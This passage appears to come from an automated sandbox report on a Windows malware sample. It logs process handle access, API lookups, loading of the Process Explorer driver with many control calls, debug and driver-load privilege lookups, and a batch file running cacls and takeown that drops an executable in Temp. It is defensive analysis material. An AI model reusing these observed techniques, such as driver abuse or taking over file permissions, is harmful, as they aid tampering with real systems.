| Open | c:\program files (x86)\internet explorer\divorce mode twelve.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\unp\convertible-suicide-construction.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\mas.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\flashing_gcc_little.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows portable devices\americannumberssubstance.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft office\stupid-jeffrey-investors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\successfully.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\rempl\does.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\chocolate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\gnu.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows photo viewer\superbguilty.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\daddy.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows security\vt mapping.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\primarily-walk.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\hungary.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\maternity.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\telephony_assumption_pharmacies.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\m.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\compattelrunner.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\nwqzqdpd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\servicing\trustedinstaller.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\mxkefu6a.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (72)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff931f40000 |
|
17 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe, file_name_orig = C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff92fdee1a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff92fdee4e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff92fde4710 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff92fdebcd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff92fdf1fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff92fdf1f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff92fdf1f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff92fdee1e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff92fdeb200 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff931f83770 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff931f80f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff931f809e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff92fdee6e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff931f80ff0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff931f808e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff931fe6fa0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff931fc51c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff931fe99c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff92fdee2c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff92fe06b80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff92f228b70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff92fe06d50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff92fde8f30 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff92fe06e90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff92fdec1d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff92fe070a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff92fdee3b0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff92fe071d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff92fde62d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff92f1bf2e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff92fde5eb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff92fdec1b0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtLoadDriver, address_out = 0x7ff931fe7300 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ff931f51620 |
|
2 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ff931fe56b0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ff931fe5830 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ff931fe5a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ff931fe7da0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ff931fe7a40 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ff931fe77c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ff931fe5e90 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ff931fe5590 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ff931fe5db0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ff931f5bfc0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ff931f642e0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ff931f5c460 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ff931f5c460 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ff931f65220 |
|
1 |
Driver (2236)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | \??\C:\WINDOWS\system32\Drivers\PROCEXP152.SYS | - |
|
1 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
2017 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
129 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
72 |
User (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Lookup Privilege | privilege = SeLoadDriverPrivilege, luid = 10 |
|
1 |
System (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = System Directory, result_out = C:\WINDOWS\system32 |
|
1 | |
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
8 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #38: cmd.exe
343
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Security\vt mapping.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1088 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F4C
0x
A60
|
Host Behavior
File (265)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
134 | |
| Open | STD_INPUT_HANDLE | - |
|
12 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 70 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 55 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 21 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0xf98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0xee8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x1394, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "vt mapping.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "vt mapping.exe" |
|
1 |
Process #40: mxkefu6a.exe
177
0
| Information | Value |
|---|---|
| ID | #40 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x390 |
| Parent PID | 0x1304 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D30
0x
BB4
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
